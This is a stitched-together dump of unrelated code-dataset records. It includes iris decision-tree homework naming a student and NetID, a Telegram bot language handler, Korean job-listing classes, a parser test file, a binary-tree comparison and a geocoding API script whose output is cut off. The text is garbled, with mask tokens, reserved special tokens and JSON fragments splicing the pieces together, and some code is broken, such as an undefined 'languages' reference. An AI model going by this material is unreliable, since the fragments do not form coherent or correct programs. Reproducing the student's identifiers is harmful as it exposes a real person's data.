"step-3": "<mask token>\niris_dataset = load_iris()\nX = iris_dataset['data']\ny = iris_dataset['target']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1,\n stratify=y, random_state=42)\nmodel = []\nfor c in range(1, 11):\n tree = DecisionTreeClassifier(max_depth=4, random_state=c)\n model.append(tree.fit(X_train, y_train))\nin_sample_accuracy = []\nout_of_sample_accuracy = []\nfor a in model:\n in_sample_accuracy.append(a.score(X_train, y_train))\n out_of_sample_accuracy.append(a.score(X_test, y_test))\na = list(range(1, 11))\na.append('mean')\na.append('standard')\nin_sample_accuracy.append(np.mean(in_sample_accuracy))\nin_sample_accuracy.append(np.std(in_sample_accuracy[:-1]))\nout_of_sample_accuracy.append(np.mean(out_of_sample_accuracy))\nout_of_sample_accuracy.append(np.std(out_of_sample_accuracy[:-1]))\nb = pd.DataFrame([in_sample_accuracy, out_of_sample_accuracy], columns=a,\n index=['in_sample_accuracy', 'out_of_sample_accuracy'])\npd.set_option('precision', 3)\nb\nCVS = []\nscore = cross_val_score(DecisionTreeClassifier(max_depth=4), X_train,\n y_train, cv=10)\nCVS.append(score)\npd.set_option('precision', 3)\nc = pd.DataFrame(CVS, columns=['result1', 'result2', 'result3', 'result4',\n 'result5', 'result6', 'result7', 'result8', 'result9', 'result 10'])\nc['mean'] = c.mean(1)\nc['standard'] = c.std(1)\ndt = DecisionTreeClassifier(max_depth=4)\ndt.fit(X_train, y_train)\nc['Out-of-sample-accuracy'] = dt.score(X_test, y_test)\nc\nprint('My name is Fengkai Xu')\nprint('My NetID is: fengkai4')\nprint(\n 'I hereby certify that I have read the University policy on Academic Integrity and that I am not in violation.'\n )\n",
"step-4": "from sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport numpy as np\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import cross_val_score\niris_dataset = load_iris()\nX = iris_dataset['data']\ny = iris_dataset['target']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1,\n stratify=y, random_state=42)\nmodel = []\nfor c in range(1, 11):\n tree = DecisionTreeClassifier(max_depth=4, random_state=c)\n model.append(tree.fit(X_train, y_train))\nin_sample_accuracy = []\nout_of_sample_accuracy = []\nfor a in model:\n in_sample_accuracy.append(a.score(X_train, y_train))\n out_of_sample_accuracy.append(a.score(X_test, y_test))\na = list(range(1, 11))\na.append('mean')\na.append('standard')\nin_sample_accuracy.append(np.mean(in_sample_accuracy))\nin_sample_accuracy.append(np.std(in_sample_accuracy[:-1]))\nout_of_sample_accuracy.append(np.mean(out_of_sample_accuracy))\nout_of_sample_accuracy.append(np.std(out_of_sample_accuracy[:-1]))\nb = pd.DataFrame([in_sample_accuracy, out_of_sample_accuracy], columns=a,\n index=['in_sample_accuracy', 'out_of_sample_accuracy'])\npd.set_option('precision', 3)\nb\nCVS = []\nscore = cross_val_score(DecisionTreeClassifier(max_depth=4), X_train,\n y_train, cv=10)\nCVS.append(score)\npd.set_option('precision', 3)\nc = pd.DataFrame(CVS, columns=['result1', 'result2', 'result3', 'result4',\n 'result5', 'result6', 'result7', 'result8', 'result9', 'result 10'])\nc['mean'] = c.mean(1)\nc['standard'] = c.std(1)\ndt = DecisionTreeClassifier(max_depth=4)\ndt.fit(X_train, y_train)\nc['Out-of-sample-accuracy'] = dt.score(X_test, y_test)\nc\nprint('My name is Fengkai Xu')\nprint('My NetID is: fengkai4')\nprint(\n 'I hereby certify that I have read the University policy on Academic Integrity and that I am not in violation.'\n )\n",
"step-5": "\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.datasets import load_iris\r\nfrom sklearn.model_selection import cross_val_score\r\niris_dataset=load_iris()\r\nX=iris_dataset['data']\r\ny=iris_dataset['target']\r\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.1,stratify=y,random_state=42)\r\nmodel=[]\r\nfor c in range(1,11):\r\n tree=DecisionTreeClassifier(max_depth=4,random_state=c)\r\n model.append(tree.fit(X_train,y_train))\r\nin_sample_accuracy=[]\r\nout_of_sample_accuracy=[]\r\nfor a in model:\r\n in_sample_accuracy.append(a.score(X_train,y_train))\r\n out_of_sample_accuracy.append(a.score(X_test,y_test))\r\n\r\na=list(range(1,11))\r\na.append('mean')\r\na.append('standard')\r\nin_sample_accuracy.append(np.mean(in_sample_accuracy))\r\nin_sample_accuracy.append(np.std(in_sample_accuracy[:-1]))\r\nout_of_sample_accuracy.append(np.mean(out_of_sample_accuracy))\r\nout_of_sample_accuracy.append(np.std(out_of_sample_accuracy[:-1]))\r\nb=pd.DataFrame([in_sample_accuracy,out_of_sample_accuracy,],\r\n columns=a,index=['in_sample_accuracy','out_of_sample_accuracy'])\r\npd.set_option('precision',3)\r\nb\r\n#cross validation\r\nCVS=[]\r\nscore=cross_val_score(DecisionTreeClassifier(max_depth=4),X_train,y_train,cv=10)\r\nCVS.append(score)\r\npd.set_option('precision',3)\r\nc=pd.DataFrame(CVS,columns=['result1','result2','result3','result4','result5','result6','result7','result8','result9','result 10'],)\r\nc['mean']=c.mean(1)\r\nc['standard']=c.std(1)\r\ndt=DecisionTreeClassifier(max_depth=4)\r\ndt.fit(X_train,y_train)\r\nc['Out-of-sample-accuracy']=dt.score(X_test,y_test)\r\nc\r\nprint(\"My name is Fengkai Xu\")\r\nprint(\"My NetID is: fengkai4\")\r\nprint(\"I hereby certify that I have read the University policy on Academic Integrity and that I am not in violation.\")",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
print('HELLO3')
<|reserved_special_token_1|>
print("HELLO3")
|
flexible
|
{
"blob_id": "74be250df785590ecf45e048b0d6189e2b445889",
"index": 2181,
"step-1": "<mask token>\n",
"step-2": "print('HELLO3')\n",
"step-3": "print(\"HELLO3\")\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class Jobs:
def __init__(self, name, type, experience, education, keyword, salary,
url, start, end):
self.name = name
self.type = type
self.experience = experience
self.education = education
self.keyword = keyword
self.salary = salary
self.url = url
self.start = start
self.end = end
def getString(self):
return ('공고명 : ' + self.name + '\n채용형태 : ' + self.type + '\n경력 : ' +
self.experience + '\n학력 : ' + self.education + '\n업무 : ' + self
.keyword + '\n연봉 : ' + self.salary)
def getTeleString(self):
return '공고명 : ' + self.name
<|reserved_special_token_1|>
class Coms:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Jobs:
def __init__(self, name, type, experience, education, keyword, salary,
url, start, end):
self.name = name
self.type = type
self.experience = experience
self.education = education
self.keyword = keyword
self.salary = salary
self.url = url
self.start = start
self.end = end
def getString(self):
return ('공고명 : ' + self.name + '\n채용형태 : ' + self.type + '\n경력 : ' +
self.experience + '\n학력 : ' + self.education + '\n업무 : ' + self
.keyword + '\n연봉 : ' + self.salary)
def getTeleString(self):
return '공고명 : ' + self.name
<|reserved_special_token_1|>
class Coms:
def __init__(self, name, addr, coord):
self.name = name
self.addr = addr
self.coord = coord
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Jobs:
def __init__(self, name, type, experience, education, keyword, salary,
url, start, end):
self.name = name
self.type = type
self.experience = experience
self.education = education
self.keyword = keyword
self.salary = salary
self.url = url
self.start = start
self.end = end
def getString(self):
return ('공고명 : ' + self.name + '\n채용형태 : ' + self.type + '\n경력 : ' +
self.experience + '\n학력 : ' + self.education + '\n업무 : ' + self
.keyword + '\n연봉 : ' + self.salary)
def getTeleString(self):
return '공고명 : ' + self.name
<|reserved_special_token_1|>
class Coms:
def __init__(self, name, addr, coord):
self.name = name
self.addr = addr
self.coord = coord
<|reserved_special_token_0|>
def getTeleString(self):
return '회사명 : ' + self.name + ', 주소 : ' + self.addr
class Jobs:
def __init__(self, name, type, experience, education, keyword, salary,
url, start, end):
self.name = name
self.type = type
self.experience = experience
self.education = education
self.keyword = keyword
self.salary = salary
self.url = url
self.start = start
self.end = end
def getString(self):
return ('공고명 : ' + self.name + '\n채용형태 : ' + self.type + '\n경력 : ' +
self.experience + '\n학력 : ' + self.education + '\n업무 : ' + self
.keyword + '\n연봉 : ' + self.salary)
def getTeleString(self):
return '공고명 : ' + self.name
<|reserved_special_token_1|>
class Coms:
def __init__(self, name, addr, coord):
self.name = name
self.addr = addr
self.coord = coord
def getString(self):
return "회사명\n"+self.name+"\n\n주소\n"+self.addr
def getTeleString(self):
return "회사명 : " + self.name + ", 주소 : " + self.addr
class Jobs:
def __init__(self, name, type, experience, education, keyword, salary, url, start, end):
self.name = name
self.type = type
self.experience = experience
self.education = education
self.keyword = keyword
self.salary = salary
self.url=url
self.start = start
self.end = end
def getString(self):
return "공고명 : " + self.name + "\n채용형태 : " + self.type + "\n경력 : " + self.experience + "\n학력 : " + self.education + "\n업무 : " + self.keyword + "\n연봉 : " + self.salary
def getTeleString(self):
return "공고명 : " + self.name
|
flexible
|
{
"blob_id": "bcc24d5f97e46433acb8bcfb08fe582f51eb28ce",
"index": 2932,
"step-1": "<mask token>\n\n\nclass Jobs:\n\n def __init__(self, name, type, experience, education, keyword, salary,\n url, start, end):\n self.name = name\n self.type = type\n self.experience = experience\n self.education = education\n self.keyword = keyword\n self.salary = salary\n self.url = url\n self.start = start\n self.end = end\n\n def getString(self):\n return ('공고명 : ' + self.name + '\\n채용형태 : ' + self.type + '\\n경력 : ' +\n self.experience + '\\n학력 : ' + self.education + '\\n업무 : ' + self\n .keyword + '\\n연봉 : ' + self.salary)\n\n def getTeleString(self):\n return '공고명 : ' + self.name\n",
"step-2": "class Coms:\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Jobs:\n\n def __init__(self, name, type, experience, education, keyword, salary,\n url, start, end):\n self.name = name\n self.type = type\n self.experience = experience\n self.education = education\n self.keyword = keyword\n self.salary = salary\n self.url = url\n self.start = start\n self.end = end\n\n def getString(self):\n return ('공고명 : ' + self.name + '\\n채용형태 : ' + self.type + '\\n경력 : ' +\n self.experience + '\\n학력 : ' + self.education + '\\n업무 : ' + self\n .keyword + '\\n연봉 : ' + self.salary)\n\n def getTeleString(self):\n return '공고명 : ' + self.name\n",
"step-3": "class Coms:\n\n def __init__(self, name, addr, coord):\n self.name = name\n self.addr = addr\n self.coord = coord\n <mask token>\n <mask token>\n\n\nclass Jobs:\n\n def __init__(self, name, type, experience, education, keyword, salary,\n url, start, end):\n self.name = name\n self.type = type\n self.experience = experience\n self.education = education\n self.keyword = keyword\n self.salary = salary\n self.url = url\n self.start = start\n self.end = end\n\n def getString(self):\n return ('공고명 : ' + self.name + '\\n채용형태 : ' + self.type + '\\n경력 : ' +\n self.experience + '\\n학력 : ' + self.education + '\\n업무 : ' + self\n .keyword + '\\n연봉 : ' + self.salary)\n\n def getTeleString(self):\n return '공고명 : ' + self.name\n",
"step-4": "class Coms:\n\n def __init__(self, name, addr, coord):\n self.name = name\n self.addr = addr\n self.coord = coord\n <mask token>\n\n def getTeleString(self):\n return '회사명 : ' + self.name + ', 주소 : ' + self.addr\n\n\nclass Jobs:\n\n def __init__(self, name, type, experience, education, keyword, salary,\n url, start, end):\n self.name = name\n self.type = type\n self.experience = experience\n self.education = education\n self.keyword = keyword\n self.salary = salary\n self.url = url\n self.start = start\n self.end = end\n\n def getString(self):\n return ('공고명 : ' + self.name + '\\n채용형태 : ' + self.type + '\\n경력 : ' +\n self.experience + '\\n학력 : ' + self.education + '\\n업무 : ' + self\n .keyword + '\\n연봉 : ' + self.salary)\n\n def getTeleString(self):\n return '공고명 : ' + self.name\n",
"step-5": "class Coms:\n def __init__(self, name, addr, coord):\n self.name = name\n self.addr = addr\n self.coord = coord\n\n def getString(self):\n return \"회사명\\n\"+self.name+\"\\n\\n주소\\n\"+self.addr\n\n def getTeleString(self):\n return \"회사명 : \" + self.name + \", 주소 : \" + self.addr\n\nclass Jobs:\n def __init__(self, name, type, experience, education, keyword, salary, url, start, end):\n self.name = name\n self.type = type\n self.experience = experience\n self.education = education\n self.keyword = keyword\n self.salary = salary\n self.url=url\n self.start = start\n self.end = end\n\n def getString(self):\n return \"공고명 : \" + self.name + \"\\n채용형태 : \" + self.type + \"\\n경력 : \" + self.experience + \"\\n학력 : \" + self.education + \"\\n업무 : \" + self.keyword + \"\\n연봉 : \" + self.salary\n\n def getTeleString(self):\n return \"공고명 : \" + self.name",
"step-ids": [
4,
5,
6,
7,
9
]
}
|
[
4,
5,
6,
7,
9
] |
<|reserved_special_token_0|>
class TestParsers(unittest.TestCase):
<|reserved_special_token_0|>
def test_part_date_short(self):
date = '8/5/13 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.
parse_date_short(date))
def test_parse_line(self):
line = ['1', '2', '3']
actual = undertest.parse_line(line)
expected = [1, 2, 3]
self.assertTrue(all(x == y for x, y in zip(expected, actual)))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestParsers(unittest.TestCase):
def test_parse_date(self):
date = '8/5/2013 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.
parse_date(date))
def test_part_date_short(self):
date = '8/5/13 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.
parse_date_short(date))
def test_parse_line(self):
line = ['1', '2', '3']
actual = undertest.parse_line(line)
expected = [1, 2, 3]
self.assertTrue(all(x == y for x, y in zip(expected, actual)))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestParsers(unittest.TestCase):
def test_parse_date(self):
date = '8/5/2013 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.
parse_date(date))
def test_part_date_short(self):
date = '8/5/13 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.
parse_date_short(date))
def test_parse_line(self):
line = ['1', '2', '3']
actual = undertest.parse_line(line)
expected = [1, 2, 3]
self.assertTrue(all(x == y for x, y in zip(expected, actual)))
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import crisis.parsers as undertest
import datetime
import unittest
class TestParsers(unittest.TestCase):
def test_parse_date(self):
date = '8/5/2013 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.
parse_date(date))
def test_part_date_short(self):
date = '8/5/13 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.
parse_date_short(date))
def test_parse_line(self):
line = ['1', '2', '3']
actual = undertest.parse_line(line)
expected = [1, 2, 3]
self.assertTrue(all(x == y for x, y in zip(expected, actual)))
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
"""
Tests for parsers.py
@author Kevin Wilson <[email protected]>
"""
import crisis.parsers as undertest
import datetime
import unittest
class TestParsers(unittest.TestCase):
def test_parse_date(self):
date = '8/5/2013 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14),
undertest.parse_date(date))
def test_part_date_short(self):
date = '8/5/13 16:14'
self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14),
undertest.parse_date_short(date))
def test_parse_line(self):
line = ["1","2","3"]
actual = undertest.parse_line(line)
expected = [1,2,3]
self.assertTrue(all(x == y for x, y in zip(expected, actual)))
if __name__ == '__main__':
unittest.main()
|
flexible
|
{
"blob_id": "253d37f29e33f61d7e1a5ec2f9a1d6307a2ae108",
"index": 6921,
"step-1": "<mask token>\n\n\nclass TestParsers(unittest.TestCase):\n <mask token>\n\n def test_part_date_short(self):\n date = '8/5/13 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date_short(date))\n\n def test_parse_line(self):\n line = ['1', '2', '3']\n actual = undertest.parse_line(line)\n expected = [1, 2, 3]\n self.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestParsers(unittest.TestCase):\n\n def test_parse_date(self):\n date = '8/5/2013 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date(date))\n\n def test_part_date_short(self):\n date = '8/5/13 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date_short(date))\n\n def test_parse_line(self):\n line = ['1', '2', '3']\n actual = undertest.parse_line(line)\n expected = [1, 2, 3]\n self.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestParsers(unittest.TestCase):\n\n def test_parse_date(self):\n date = '8/5/2013 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date(date))\n\n def test_part_date_short(self):\n date = '8/5/13 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date_short(date))\n\n def test_parse_line(self):\n line = ['1', '2', '3']\n actual = undertest.parse_line(line)\n expected = [1, 2, 3]\n self.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "<mask token>\nimport crisis.parsers as undertest\nimport datetime\nimport unittest\n\n\nclass TestParsers(unittest.TestCase):\n\n def test_parse_date(self):\n date = '8/5/2013 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date(date))\n\n def test_part_date_short(self):\n date = '8/5/13 16:14'\n self.assertEqual(datetime.datetime(2013, 8, 5, 16, 14), undertest.\n parse_date_short(date))\n\n def test_parse_line(self):\n line = ['1', '2', '3']\n actual = undertest.parse_line(line)\n expected = [1, 2, 3]\n self.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "\"\"\"\nTests for parsers.py\n\n@author Kevin Wilson <[email protected]>\n\"\"\"\nimport crisis.parsers as undertest\n\nimport datetime\nimport unittest\n\nclass TestParsers(unittest.TestCase):\n\tdef test_parse_date(self):\n\t\tdate = '8/5/2013 16:14'\n\t\tself.assertEqual(datetime.datetime(2013, 8, 5, 16, 14),\n\t\t\t\t\t\tundertest.parse_date(date))\n\n\tdef test_part_date_short(self):\n\t\tdate = '8/5/13 16:14'\n\t\tself.assertEqual(datetime.datetime(2013, 8, 5, 16, 14),\n\t\t\t\t\t\tundertest.parse_date_short(date))\n\n\tdef test_parse_line(self):\n\t\tline = [\"1\",\"2\",\"3\"]\n\t\tactual = undertest.parse_line(line)\n\t\texpected = [1,2,3]\n\t\tself.assertTrue(all(x == y for x, y in zip(expected, actual)))\n\nif __name__ == '__main__':\n\tunittest.main()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from pyrogram import Client, filters
from pyrogram.errors import MessageNotModified
from db.models import *
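# "change language" button pressed: show the language picker for this settings instance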
@Client.on_callback_query(filters.regex('^change_lg_'))
async def on_change_language(_, callback):
settings_id = int(callback.data.split('_')[2])
with db_session:
settings = SettingsInstance.get(id=settings_id)
if not settings or not settings.can_edit(callback.db_user):
await callback.answer(callback.db_user.get_message('not_admin'), show_alert=True)
return
await callback.answer()
await callback.edit_message_text(**languages.create_message_data(callback.db_user, settings.chat, settings))
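# a language was chosen: persist it on the chat and redraw the picker in that language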
@Client.on_callback_query(filters.regex('^language_g_'))
async def on_language_selected(_, callback):
data = callback.data.split('_')[2:]
settings_id = int(data[0])
language = '_'.join(data[1:])
with db_session:
settings = SettingsInstance.get(id=settings_id)
if not settings or not settings.can_edit(callback.db_user):
await callback.answer(callback.db_user.get_message('not_admin'), show_alert=True)
return
settings.chat.language = language
await callback.answer(settings.chat.get_message('language_selected', flag=settings.chat.get_message('flag')),
show_alert=True)
try:
await callback.edit_message_text(**languages.create_message_data(callback.db_user, settings.chat, settings))
except MessageNotModified: # If the user selects the same language he already had
pass
|
normal
|
{
"blob_id": "dd053da45d2577772414b1373ba324b0bfdc0d94",
"index": 6605,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]_callback_query(filters.regex('^change_lg_'))\nasync def on_change_language(_, callback):\n settings_id = int(callback.data.split('_')[2])\n with db_session:\n settings = SettingsInstance.get(id=settings_id)\n if not settings or not settings.can_edit(callback.db_user):\n await callback.answer(callback.db_user.get_message('not_admin'),\n show_alert=True)\n return\n await callback.answer()\n await callback.edit_message_text(**languages.create_message_data(\n callback.db_user, settings.chat, settings))\n\n\[email protected]_callback_query(filters.regex('^language_g_'))\nasync def on_language_selected(_, callback):\n data = callback.data.split('_')[2:]\n settings_id = int(data[0])\n language = '_'.join(data[1:])\n with db_session:\n settings = SettingsInstance.get(id=settings_id)\n if not settings or not settings.can_edit(callback.db_user):\n await callback.answer(callback.db_user.get_message('not_admin'),\n show_alert=True)\n return\n settings.chat.language = language\n await callback.answer(settings.chat.get_message('language_selected',\n flag=settings.chat.get_message('flag')), show_alert=True)\n try:\n await callback.edit_message_text(**languages.\n create_message_data(callback.db_user, settings.chat, settings))\n except MessageNotModified:\n pass\n",
"step-3": "from pyrogram import Client, filters\nfrom pyrogram.errors import MessageNotModified\nfrom db.models import *\n\n\[email protected]_callback_query(filters.regex('^change_lg_'))\nasync def on_change_language(_, callback):\n settings_id = int(callback.data.split('_')[2])\n with db_session:\n settings = SettingsInstance.get(id=settings_id)\n if not settings or not settings.can_edit(callback.db_user):\n await callback.answer(callback.db_user.get_message('not_admin'),\n show_alert=True)\n return\n await callback.answer()\n await callback.edit_message_text(**languages.create_message_data(\n callback.db_user, settings.chat, settings))\n\n\[email protected]_callback_query(filters.regex('^language_g_'))\nasync def on_language_selected(_, callback):\n data = callback.data.split('_')[2:]\n settings_id = int(data[0])\n language = '_'.join(data[1:])\n with db_session:\n settings = SettingsInstance.get(id=settings_id)\n if not settings or not settings.can_edit(callback.db_user):\n await callback.answer(callback.db_user.get_message('not_admin'),\n show_alert=True)\n return\n settings.chat.language = language\n await callback.answer(settings.chat.get_message('language_selected',\n flag=settings.chat.get_message('flag')), show_alert=True)\n try:\n await callback.edit_message_text(**languages.\n create_message_data(callback.db_user, settings.chat, settings))\n except MessageNotModified:\n pass\n",
"step-4": "from pyrogram import Client, filters\nfrom pyrogram.errors import MessageNotModified\n\nfrom db.models import *\n\n\[email protected]_callback_query(filters.regex('^change_lg_'))\nasync def on_change_language(_, callback):\n settings_id = int(callback.data.split('_')[2])\n\n with db_session:\n settings = SettingsInstance.get(id=settings_id)\n\n if not settings or not settings.can_edit(callback.db_user):\n await callback.answer(callback.db_user.get_message('not_admin'), show_alert=True)\n return\n\n await callback.answer()\n await callback.edit_message_text(**languages.create_message_data(callback.db_user, settings.chat, settings))\n\n\[email protected]_callback_query(filters.regex('^language_g_'))\nasync def on_language_selected(_, callback):\n data = callback.data.split('_')[2:]\n settings_id = int(data[0])\n language = '_'.join(data[1:])\n\n with db_session:\n settings = SettingsInstance.get(id=settings_id)\n\n if not settings or not settings.can_edit(callback.db_user):\n await callback.answer(callback.db_user.get_message('not_admin'), show_alert=True)\n return\n\n settings.chat.language = language\n await callback.answer(settings.chat.get_message('language_selected', flag=settings.chat.get_message('flag')),\n show_alert=True)\n\n try:\n await callback.edit_message_text(**languages.create_message_data(callback.db_user, settings.chat, settings))\n except MessageNotModified: # If the user selects the same language he already had\n pass\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
return rootA.val == rootB.val and self.solution(rootA.left, rootB.left
) and self.solution(rootA.right, rootB.right)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
return rootA.val == rootB.val and self.solution(rootA.left, rootB.left
) and self.solution(rootA.right, rootB.right)
<|reserved_special_token_0|>
A.insert(100)
A.insert(102)
A.insert(96)
<|reserved_special_token_0|>
B.insert(100)
B.insert(102)
B.insert(96)
<|reserved_special_token_0|>
print(res)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
return rootA.val == rootB.val and self.solution(rootA.left, rootB.left
) and self.solution(rootA.right, rootB.right)
A = BinaryTree()
A.insert(100)
A.insert(102)
A.insert(96)
B = BinaryTree()
B.insert(100)
B.insert(102)
B.insert(96)
res = Solution().solution(A.root, B.root)
print(res)
<|reserved_special_token_1|>
from Level6.Trees.BinaryTree import BinaryTree
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
return rootA.val == rootB.val and self.solution(rootA.left, rootB.left
) and self.solution(rootA.right, rootB.right)
A = BinaryTree()
A.insert(100)
A.insert(102)
A.insert(96)
B = BinaryTree()
B.insert(100)
B.insert(102)
B.insert(96)
res = Solution().solution(A.root, B.root)
print(res)
<|reserved_special_token_1|>
# Given two binary trees, write a function to check if they are equal or not.
#
# Two binary trees are considered equal if they are structurally identical and the nodes have the same value.
#
# Return 0 / 1 ( 0 for false, 1 for true ) for this problem
#
# Example :
#
# Input :
#
# 1 1
# / \ / \
# 2 3 2 3
#
# Output :
# 1 or True
from Level6.Trees.BinaryTree import BinaryTree
class Solution:
def solution(self, rootA, rootB):
if rootA == rootB:
print('h')
return True
if rootA is None or rootB is None:
return False
# if rootA is None and rootB is None:
# return True
return ((rootA.val == rootB.val) and self.solution(rootA.left, rootB.left) and
self.solution(rootA.right, rootB.right))
A = BinaryTree()
A.insert(100)
A.insert(102)
A.insert(96)
B = BinaryTree()
B.insert(100)
B.insert(102)
B.insert(96)
res = Solution().solution(A.root, B.root)
print(res)
|
flexible
|
{
"blob_id": "4a0eca90de3ce7fb0ab6decb0ec6aadb32c1a9fa",
"index": 601,
"step-1": "<mask token>\n\n\nclass Solution:\n\n def solution(self, rootA, rootB):\n if rootA == rootB:\n print('h')\n return True\n if rootA is None or rootB is None:\n return False\n return rootA.val == rootB.val and self.solution(rootA.left, rootB.left\n ) and self.solution(rootA.right, rootB.right)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n\n def solution(self, rootA, rootB):\n if rootA == rootB:\n print('h')\n return True\n if rootA is None or rootB is None:\n return False\n return rootA.val == rootB.val and self.solution(rootA.left, rootB.left\n ) and self.solution(rootA.right, rootB.right)\n\n\n<mask token>\nA.insert(100)\nA.insert(102)\nA.insert(96)\n<mask token>\nB.insert(100)\nB.insert(102)\nB.insert(96)\n<mask token>\nprint(res)\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def solution(self, rootA, rootB):\n if rootA == rootB:\n print('h')\n return True\n if rootA is None or rootB is None:\n return False\n return rootA.val == rootB.val and self.solution(rootA.left, rootB.left\n ) and self.solution(rootA.right, rootB.right)\n\n\nA = BinaryTree()\nA.insert(100)\nA.insert(102)\nA.insert(96)\nB = BinaryTree()\nB.insert(100)\nB.insert(102)\nB.insert(96)\nres = Solution().solution(A.root, B.root)\nprint(res)\n",
"step-4": "from Level6.Trees.BinaryTree import BinaryTree\n\n\nclass Solution:\n\n def solution(self, rootA, rootB):\n if rootA == rootB:\n print('h')\n return True\n if rootA is None or rootB is None:\n return False\n return rootA.val == rootB.val and self.solution(rootA.left, rootB.left\n ) and self.solution(rootA.right, rootB.right)\n\n\nA = BinaryTree()\nA.insert(100)\nA.insert(102)\nA.insert(96)\nB = BinaryTree()\nB.insert(100)\nB.insert(102)\nB.insert(96)\nres = Solution().solution(A.root, B.root)\nprint(res)\n",
"step-5": "# Given two binary trees, write a function to check if they are equal or not.\n#\n# Two binary trees are considered equal if they are structurally identical and the nodes have the same value.\n#\n# Return 0 / 1 ( 0 for false, 1 for true ) for this problem\n#\n# Example :\n#\n# Input :\n#\n# 1 1\n# / \\ / \\\n# 2 3 2 3\n#\n# Output :\n# 1 or True\n\n\nfrom Level6.Trees.BinaryTree import BinaryTree\n\n\nclass Solution:\n\n def solution(self, rootA, rootB):\n\n if rootA == rootB:\n print('h')\n return True\n\n if rootA is None or rootB is None:\n return False\n\n # if rootA is None and rootB is None:\n # return True\n\n return ((rootA.val == rootB.val) and self.solution(rootA.left, rootB.left) and\n self.solution(rootA.right, rootB.right))\n\n\nA = BinaryTree()\nA.insert(100)\nA.insert(102)\nA.insert(96)\nB = BinaryTree()\nB.insert(100)\nB.insert(102)\nB.insert(96)\nres = Solution().solution(A.root, B.root)\nprint(res)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#API End Points by Mitul
import urllib.error, urllib.request, urllib.parse
import json
target = 'http://py4e-data.dr-chuck.net/json?'
local = input('Enter location: ')
url = target + urllib.parse.urlencode({'address': local, 'key' : 42})
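# build the request URL, URL-encoding the user-supplied address alongside the fixed key parameter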
print('Retrieving', url)
data = urllib.request.urlopen(url).read()
print('Retrieved', len(data), 'characters')
js = json.loads(data)
print(json.dumps(js, indent = 4))
print('Place id', js['results'][0]['place_id'])
'''Output:
Enter location: >? UIUC
Retrieving http://py4e-data.dr-chuck.net/json?address=UIUC&key=42
Retrieved 1720 characters
{
"results": [
{
"access_points": [],
"address_components": [
{
"long_name": "Champaign",
"short_name": "Champaign",
"types": [
"locality",
"political"
]
},
{
"long_name": "Champaign County",
"short_name": "Champaign County",
"types": [
"administrative_area_level_2",
"political"
]
},
{
"long_name": "Illinois",
"short_name": "IL",
"types": [
"administrative_area_level_1",
"political"
]
},
{
"long_name": "United States",
"short_name": "US",
"types": [
"country",
"political"
]
}
],
